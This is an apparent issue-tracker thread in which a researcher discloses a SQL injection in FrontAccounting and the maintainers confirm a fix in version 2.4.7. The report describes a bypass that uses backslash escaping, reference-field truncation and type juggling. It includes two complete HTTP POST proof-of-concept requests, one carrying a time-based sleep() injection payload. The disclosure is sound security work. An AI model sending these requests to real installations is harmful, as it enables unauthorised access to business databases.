SQL Injection

[Ginnz]

Sorry,This is my first time to chat with people in English.

Frontaccounting is using function db_escape() to escape value. But some variables do not use the function db_escape(). environment : docker mattrayner/lamp:latest-1604

0x00 Description

includes/db/class.reflines_db.inc:156 If I set parameter $reference like ‘XXXXXX\’. Single quotes can escape.And I can inject in parameter $type includes/references.inc:365 admin/db/voiding_db.inc:127 admin/void_transaction.php:316 admin/void_transaction.php:352 So parameter $type can be controlled How about parameter $reference? get_systype_db_info() After that I found some insert statements of table grn_batch. purchasing/includes/db/grn_db.inc:170 purchasing/includes/db/grn_db.inc:99 purchasing/po_receive_items.php:254 So parameter $reference can be controlled

0x01 Bypass：

1. PHP switch ($type) The variable $type like ‘25’in here is same as ‘+25dasdsadasda.
2. Mysql Converting a string into an integer has some problems in mysql. '25'= '25dasdasdasd'= '+25dasdasdasd' String and integer can be added.
3. Mysql has SQL Truncation problem so that ‘\’ can be truncated

0x02 POC:

Settings such as ‘001/2018\’ will report an error, but ‘001/2018\’ will not . I noticed that refererence is 60 bytes, set the payload to 61 bytes like 001100422222222222222222222201700422222222222222212222/2018\\.it is 001100422222222222222222222201700422222222222222212222/2018\ in the database.

I am using po_entry_items.php, not the po_receive_items.php found above.

POST /FA1/purchasing/po_entry_items.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1/purchasing/po_entry_items.php?NewGRN=Yes
Content-Type: application/octet-stream
Content-Length: 343
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=6qb35uj2b4sv26em7d6f5i7qv3; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=i96j3h5r6hl16smme7tl0t3ie3

supplier_id=1&OrderDate=12/31/2018&ref=001100422222222222222222222201700422222222222222212222/2018\\&supp_ref=&dimension=0&StkLocation=DEF&delivery_address=N/A&_stock_id_edit=102&stock_id=101&qty=1&price=200.00&Comments=&Commit=Process%20GRN&_focus=supplier_id&_modified=0&_confirmed=&_token=YNHuXfwn6xEZH7dUBa196wxx&_random=1078360.0430200463

database:

POST /FA1//admin/void_transaction.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1//admin/void_transaction.php
Content-Type: application/octet-stream
Content-Length: 261
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=3h40pcjb2t5apf0rlcblj1ahv6; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=1e2v29h21gv4efc5g2fr0fs0q0

filterType=%2b25%2c25)%20or%20sleep(1)%23&FromTransNo=1&ToTransNo=999999&date_=12/31/2018&memo_=&trans_no=3&selected_id=3&ConfirmVoiding=%u7EE7%u7EED%u8FDB%u884C&_focus=filterType&_modified=0&_confirmed=&_token=p6ySb5gc0z5JLK4DvaC9owxx&_random=578301.3136013072

The final execution of the sql statement is like this：

SELECT * FROM 0_reflines WHERE trans_type='+25,25) or sleep(1)#' AND CHAR_LENGTH(`prefix`) AND LEFT('20170042222222222222222222220170042222222222222221222222221\', CHAR_LENGTH(`prefix`)) = `prefix` UNION SELECT * FROM 0_reflines WHERE trans_type='+25,25) and sleep(1)#' AND `prefix`=''

[itronics]

Thank you very much for this deep analysis. I have just pushed fix to the repo together with changes related to strict mode.

[FrontAccountingERP]

This issue was finally fixed in 2.4.7.